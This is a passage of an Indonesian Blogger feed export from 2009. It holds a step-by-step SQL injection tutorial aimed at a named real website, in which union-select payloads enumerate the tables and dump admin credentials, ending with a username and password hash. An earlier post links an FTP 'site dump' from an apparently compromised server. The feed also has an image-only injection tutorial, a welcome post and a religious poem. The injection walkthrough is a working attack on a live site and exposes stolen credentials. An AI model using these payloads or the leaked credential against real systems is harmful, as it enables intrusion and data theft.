style="font-weight: bold;"&gt;SOFTWARE&lt;/span&gt;&lt;br /&gt;&lt;a href="ftp://89.162.150.194/Software/"&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;ftp://89.162.150.194/Software/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;Moga² aja ini bisa bermanfaat .. site dump &lt;/span&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;buat temen² ^^&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-7152645949411555679?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/7152645949411555679/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/07/vip-owned.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7152645949411555679'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7152645949411555679'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/07/vip-owned.html' title='VIP Owned'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-7058902081555516390</id><published>2009-07-30T08:19:00.000-07:00</published><updated>2009-07-30T08:39:57.883-07:00</updated><title type='text'>SQL INJECTION -  VIDEO</title><content type='html'>SQL INJECTION + VIDEO&lt;br /&gt;- SQL Injection --&lt;br /&gt;&lt;br /&gt;----&gt; 1&lt;br /&gt;pertama kita tetapkan target terlebih dahulu&lt;br /&gt;&lt;br /&gt;target ----&gt; http://www.allaboutcar.net/&lt;br /&gt;&lt;br /&gt;Tambahkan karakter '  pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada vuln.&lt;br /&gt;&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;----&gt;&gt;&gt; 2&lt;br /&gt;mencari dan menghitung jumlah table yang ada dalam databasenya...&lt;br /&gt;gunakan perintah : +order+by+&lt;br /&gt;&lt;br /&gt;contoh:&lt;br /&gt;&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3 order by 1--&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3 order by 2--&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3 order by 3--&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3 order by 4--&lt;br /&gt;http://www.allaboutcar.net/articles.php?topic=-3 order by 5--&lt;br /&gt;sehingga muncul error atau hilang pesan error...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--------&gt; 3&lt;br /&gt;untuk mengeluarkan angka berapa yang muncul gunakan perintah union&lt;br /&gt;&lt;br /&gt;contoh&lt;br /&gt;&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3 union select 1,2,3,4,5--&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;kolom 2&lt;br /&gt;go to kolom 2&lt;br /&gt;&lt;br /&gt;Hal yang perlu kita periksa db versi 5 nya .. jika kita continu ..&lt;br /&gt;jika itsversion 4 .. Anda harus menebak tabel dan kolom&lt;br /&gt;&lt;br /&gt;untuk memeriksa versi db menggunakan perintah ini&lt;br /&gt;"@@version" atau "version()"&lt;br /&gt;&lt;br /&gt;versinya adalah&lt;br /&gt;5.0.67&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Untuk menampilkan semua isi dari table tsb adalah menggunakan perintah ini&lt;br /&gt;&lt;br /&gt;code&lt;br /&gt;&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3 union select&lt;br /&gt;1,group_concat(table_name),3,4,5 from information_schema.tables where&lt;br /&gt;table_schema=database()--&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;[code]&lt;br /&gt;&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3 union select&lt;br /&gt;1,group_concat(table_name),3,4,5 from information_schema.tables where&lt;br /&gt;table_schema=database()--&lt;/pre&gt;&lt;br /&gt;akan muncul seperti ini&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;admins,articles,ban,banners,banners_info,comments,file_categories,file_data,forum_a,forum_b,forum_c,gbook,infopages,jp_users,links_categories,links_data,mails,menu,news,poll_data,poll_desc,pw,topic,users&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;ok lets get kolom sekarang .. untuk melakukan itu hanya mengganti ini&lt;br /&gt;&lt;br /&gt;[code]&lt;br /&gt;&lt;br /&gt;&lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3 union select&lt;br /&gt;1,group_concat(table_name),3,4,5 from information_schema.table where&lt;br /&gt;table_schema=database()--&lt;/pre&gt;&lt;br /&gt;to&lt;br /&gt;[code]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt; &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3%20union%20select%201,group_concat(column_name),3,4,5%20from%20information_schema.columns%20where%20table_schema=database()--&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;[code]&lt;br /&gt;&lt;br /&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;id,nick,pass,name,added,access,mail,stat,id,date,title,text,opened,comments,discript,topic,author,id,ip,date,id,title,alt,url,img,code,mode,opened,o_limit,click,date,e_date,stat,what,id,title,text,next,id,what,date,wid,name,mail,title,text,ip,id,title,text,pos,opened,stat,id,category,title,text,link,date,pass,mail,opened,bad,stat,size,id,t&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;untuk kolom nama data dari tabel admin&lt;br /&gt;&lt;br /&gt;[code]&lt;br /&gt;&lt;br /&gt;   &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 470px; height: 34px; text-align: left;"&gt;http://www.allaboutcar.net/articles.php?topic=-3%20union%20select%201,group_concat(id,0x3a,nick,0x3a,pass),3,4,5%20from%20admins--&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;dan user sama paswordnya adalah&lt;br /&gt;&lt;br /&gt;user : MaTySeK&lt;br /&gt;Pas Hash: 9dc1fc60fcd6bb1a10b9d97e64cdc253&lt;br /&gt;&lt;br /&gt;Crack : 9dc1fc60fcd6bb1a10b9d97e64cdc253&lt;br /&gt;&lt;br /&gt;Untuk Lebih jelaas&lt;br /&gt;Download Videonya&lt;br /&gt;&lt;a href="http://www.4shared.com/get/112223635/e2dc239f/SQL_Injections_V506.html"&gt;http://www.4shared.com/get/112223635/e2dc239f/SQL_Injections_V506.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;mutar videonya pake Camtasia &lt;a href="http://www.blogger.com/d.php?soft_id=51992&amp;amp;url=http%3A%2F%2Fdownload.techsmith.com%2Fcamtasiastudio%2Fenu%2F602%2Fcamtasia.msi" rel="nofollow" target="_blank"&gt;Click to Download&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-7058902081555516390?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/7058902081555516390/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/07/sql-injection-video.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7058902081555516390'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/7058902081555516390'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/07/sql-injection-video.html' title='SQL INJECTION -  VIDEO'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-1317750384503009872</id><published>2009-07-30T07:04:00.000-07:00</published><updated>2009-07-30T07:24:25.450-07:00</updated><title type='text'>Tutorial SQL Injections</title><content type='html'>Tutorial SQL Injections (hack websites)&lt;br /&gt;&lt;br /&gt;Step 1&lt;br /&gt;&lt;br /&gt;&lt;div class="spoilerbox" id="spoil_0" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/1.png" /&gt;&lt;br /&gt;kurang jelas bisa  langsung&lt;br /&gt;&lt;a href="http://i727.photobucket.com/albums/ww273/koontol/1.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/1.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Step 2 &lt;/p&gt;&lt;div class="spoilertitle"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="spoilerbox" id="spoil_1" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/2-2.png" alt="http://i727.photobucket.com/albums/ww273/koontol/2-2.png" /&gt;&lt;a href="http://i727.photobucket.com/albums/ww273/koontol/2-2.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/2-2.png&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Step 3&lt;/p&gt;&lt;div class="spoilerbox" id="spoil_2" style=""&gt;  &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/3-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/3-1.png" /&gt; &lt;a href="http://i727.photobucket.com/albums/ww273/koontol/3-1.png"&gt;http://i727.photobucket.com/albums/ww27 … ol/3-1.png&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;Step 4 &lt;/p&gt;&lt;div class="spoilerbox" id="spoil_3" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/4-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/4-1.png" /&gt;&lt;a href="http://i727.photobucket.com/albums/ww273/koontol/4-1.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/4-1.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;p&gt;Step 5 &lt;/p&gt;&lt;div class="spoilerbox" id="spoil_4" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/5-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/5-1.png" /&gt;&lt;a href="http://i727.photobucket.com/albums/ww273/koontol/5-1.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/5-1.png&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Step 6&lt;/p&gt;&lt;div class="spoilerbox" id="spoil_5" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/6-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/6-1.png" /&gt; &lt;a href="http://i727.photobucket.com/albums/ww273/koontol/6-1.png"&gt;http://i727.photobucket.com/albums/ww27 … ol/6-1.png&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;Step 7&lt;/p&gt;&lt;div class="spoilerbox" id="spoil_6" style=""&gt;  &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/7-1-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/7-1-1.png" /&gt; &lt;a href="http://i727.photobucket.com/albums/ww273/koontol/7-1-1.png"&gt;http://i727.photobucket.com/albums/ww27 … /7-1-1.png&lt;/a&gt; &lt;/div&gt;&lt;p&gt;Step 8&lt;/p&gt;&lt;div class="spoilerbox" id="spoil_7" style=""&gt;  &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/8-1.png" alt="http://i727.photobucket.com/albums/ww273/koontol/8-1.png" /&gt;&lt;a href="http://i727.photobucket.com/albums/ww273/koontol/8-1.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/8-1.png &lt;/a&gt;&lt;/div&gt;&lt;p&gt;Step terakhir&lt;/p&gt;&lt;div class="spoilerbox" id="spoil_8" style=""&gt; &lt;img style="width: 521px; height: 407px;" class="postimg" src="http://i727.photobucket.com/albums/ww273/koontol/11.png" alt="http://i727.photobucket.com/albums/ww273/koontol/11.png" /&gt; &lt;a href="http://i727.photobucket.com/albums/ww273/koontol/11.png"&gt;http://i727.photobucket.com/albums/ww273/koontol/11.png&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cradit Alex Owners&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-1317750384503009872?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/1317750384503009872/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/07/tutorial-sql-injections.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/1317750384503009872'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/1317750384503009872'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/07/tutorial-sql-injections.html' title='Tutorial SQL Injections'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-2245578787129218314</id><published>2009-07-29T08:44:00.000-07:00</published><updated>2009-07-29T10:17:42.531-07:00</updated><title type='text'>Welcome to My Site</title><content type='html'>&lt;br&gt;&lt;Br&gt;&lt;div style="text-align: justify;"&gt;Terimakasih anda telah berkunjung ke halaman situs saya.. semoga situs ini dapat bermanfaat bagi anda, saya juga sangat berharap semoga kita sama² bersharing pengalaman dsni,walaupun situs ini hanya sebuah situs pribadi dan sebuah coretan kecil dari saya.. alangkah indah nya jika kita dapat sama² bersharing pengalaman dan pengetahuan disitus kecil saya ini.dengan harapan kita bersama² menjalinkan tali silahturrahmi sesama cyber diseluruh Indonesia. Semoga situs ini berguna bagi semua pengunjung.dan terima kasih juga kepada rekan² cyber semua yang telah mengisi shoutbox di blog ini..&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-2245578787129218314?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/2245578787129218314/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/07/welcome-to-my-site.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/2245578787129218314'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/2245578787129218314'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/07/welcome-to-my-site.html' title='Welcome to My Site'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4385849380439813980.post-8396733588633887378</id><published>2009-07-29T05:58:00.000-07:00</published><updated>2009-07-29T05:59:14.125-07:00</updated><title type='text'>Bila Al Qur'an bisa bicara</title><content type='html'>|| Bila Al Qur'an bisa bicara !||&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Waktu engkau masih kanak-kanak, kau laksana kawan sejatiku&lt;br /&gt;Dengan wudu' aku kau sentuh dalam keadaan suci&lt;br /&gt;Aku kau pegang, kau junjung dan kau pelajari&lt;br /&gt;Aku engkau baca dengan suara lirih ataupun keras setiap hari&lt;br /&gt;Setelah usai engkaupun selalu menciumku mesra...&lt;br /&gt;&lt;br /&gt;Sekarang engkau telah dewasa...&lt;br /&gt;Nampaknya kau sudah tak berminat lagi padaku...&lt;br /&gt;Apakah aku bacaan usang yang tinggal sejarah...&lt;br /&gt;Menurutmu barangkali aku bacaan yang tidak menambah pengetahuanmu&lt;br /&gt;Atau menurutmu aku hanya untuk anak kecil yang belajar mengaji saja?&lt;br /&gt;&lt;br /&gt;Sekarang aku engkau simpan rapi sekali hingga kadang engkau lupa dimana menyimpannya&lt;br /&gt;Aku sudah engkau anggap hanya sebagai perhiasan rumahmu&lt;br /&gt;Kadang kala aku dijadikan mas kawin agar engkau dianggap bertaqwa&lt;br /&gt;Atau aku kau buat penangkal untuk menakuti hantu dan syetan&lt;br /&gt;Kini aku lebih banyak tersingkir, dibiarkan dalam kesendirian dalam kesepian&lt;br /&gt;Di atas lemari, di dalam laci, aku engkau pendamkan&lt;br /&gt;&lt;br /&gt;Dulu...pagi-pagi...surah-surah yang ada padaku engkau baca beberapa halaman&lt;br /&gt;Sore harinya aku kau baca beramai-ramai bersama temanmu di surau.....&lt;br /&gt;Sekarang... pagi-pagi sambil minum kopi...engkau baca Koran pagi atau nonton berita TV&lt;br /&gt;Waktu senggang..engkau sempatkan membaca buku karangan manusia&lt;br /&gt;Sedangkan aku yang berisi ayat-ayat yang datang dari Allah Yang Maha Perkasa&lt;br /&gt;Engkau campakkan, engkau abaikan dan engkau lupakan...&lt;br /&gt;&lt;br /&gt;Waktu berangkat kerjapun kadang engkau lupa baca pembuka surah2ku (Basmalah)&lt;br /&gt;Diperjalanan engkau lebih asyik menikmati musik duniawi&lt;br /&gt;Tidak ada kaset yang berisi ayat Allah yang terdapat padaku di laci mobilmu&lt;br /&gt;Sepanjang perjalanan radiomu selalu tertuju ke stasiun radio favoritmu&lt;br /&gt;Aku tahu kalau itu bukan Stasiun Radio yang senantiasa melantunkan ayatku&lt;br /&gt;&lt;br /&gt;Di meja kerjamu tidak ada aku untuk kau baca sebelum kau mulai kerja&lt;br /&gt;Di Komputermu pun kau putar musik favoritmu&lt;br /&gt;Jarang sekali engkau putar ayat-ayatku melantun&lt;br /&gt;E-mail temanmu yang ada ayat-ayatkupun kadang kau abaikan&lt;br /&gt;Engkau terlalu sibuk dengan urusan duniamu&lt;br /&gt;Benarlah dugaanku bahwa engkau kini sudah benar-benar melupakanku&lt;br /&gt;&lt;br /&gt;Bila malam tiba engkau tahan nongkrong berjam-jam di depan TV&lt;br /&gt;Menonton pertandingan Liga Italia , musik atau Film dan Sinetron laga&lt;br /&gt;Di depan komputer berjam-jam engkau betah duduk&lt;br /&gt;Hanya sekedar membaca berita murahan dan gambar sampah&lt;br /&gt;&lt;br /&gt;Waktupun cepat berlalu...aku menjadi semakin kusam dalam lemari&lt;br /&gt;Mengumpul debu dilapisi abu dan mungkin dimakan kutu&lt;br /&gt;Seingatku hanya awal Ramadhan engkau membacaku kembali&lt;br /&gt;Itupun hanya beberapa lembar dariku&lt;br /&gt;Dengan suara dan lafadz yang tidak semerdu dulu&lt;br /&gt;Engkaupun kini terbata-bata dan kurang lancar lagi setiap membacaku&lt;br /&gt;&lt;br /&gt;Apakah Koran, TV, radio , komputer, dapat memberimu pertolongan?&lt;br /&gt;Bila engkau di kubur sendirian menunggu sampai kiamat tiba&lt;br /&gt;Engkau akan diperiksa oleh para malaikat suruhanNya&lt;br /&gt;Hanya dengan ayat-ayat Allah yang ada padaku engkau dapat selamat melaluinya&lt;br /&gt;&lt;br /&gt;Sekarang engkau begitu enteng membuang waktumu...&lt;br /&gt;Setiap saat berlalu...kuranglah jatah umurmu...&lt;br /&gt;Dan akhirnya kubur sentiasa menunggu kedatanganmu..&lt;br /&gt;Engkau bisa kembali kepada Tuhanmu sewaktu-waktu&lt;br /&gt;Apabila malaikat maut mengetuk pintu rumahmu.&lt;br /&gt;&lt;br /&gt;Bila aku engkau baca selalu dan engkau hayati...&lt;br /&gt;Di kuburmu nanti....&lt;br /&gt;Aku akan datang sebagai pemuda gagah nan tampan&lt;br /&gt;Yang akan membantu engkau membela diri&lt;br /&gt;Bukan koran yang engkau baca yang akan membantumu&lt;br /&gt;Dari perjalanan di alam akhirat&lt;br /&gt;Tapi Akulah "Qur'an" kitab sucimu&lt;br /&gt;Yang senantiasa setia menemani dan melindungimu&lt;br /&gt;&lt;br /&gt;Peganglah aku lagi . .. bacalah kembali aku setiap hari&lt;br /&gt;Karena ayat-ayat yang ada padaku adalah ayat suci&lt;br /&gt;Yang berasal dari Allah, Tuhan Yang Maha Mengetahui&lt;br /&gt;Yang disampaikan oleh Jibril kepada Muhammad Rasulullah SAW&lt;br /&gt;&lt;br /&gt;Keluarkanlah segera aku dari lemari atau lacimu...&lt;br /&gt;Jangan lupa bawa kaset yang ada ayatku dalam laci mobilmu&lt;br /&gt;Letakkan aku selalu di depan meja kerjamu&lt;br /&gt;Agar engkau senantiasa mengingat Tuhanmu&lt;br /&gt;&lt;br /&gt;Sentuhilah aku kembali...&lt;br /&gt;Baca dan pelajari lagi aku....&lt;br /&gt;Setiap datangnya pagi dan sore hari&lt;br /&gt;Seperti dulu....dulu sekali...&lt;br /&gt;Waktu engkau masih kecil , lugu dan polos...&lt;br /&gt;Di surau kecil kampungmu yang damai...&lt;br /&gt;&lt;br /&gt;Jangan aku engkau biarkan sendiri....&lt;br /&gt;Dalam bisu dan sepi....&lt;br /&gt;&lt;br /&gt;Mahabenar Allah, yang Mahaperkasa lagi Mahabijaksana&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4385849380439813980-8396733588633887378?l=bh4nd.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bh4nd.blogspot.com/feeds/8396733588633887378/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://bh4nd.blogspot.com/2009/07/bila-al-quran-bisa-bicara_29.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/8396733588633887378'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4385849380439813980/posts/default/8396733588633887378'/><link rel='alternate' type='text/html' href='http://bh4nd.blogspot.com/2009/07/bila-al-quran-bisa-bicara_29.html' title='Bila Al Qur&apos;an bisa bicara'/><author><name>bh4nned®</name><uri>http://www.blogger.com/profile/02844060611053422414</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>
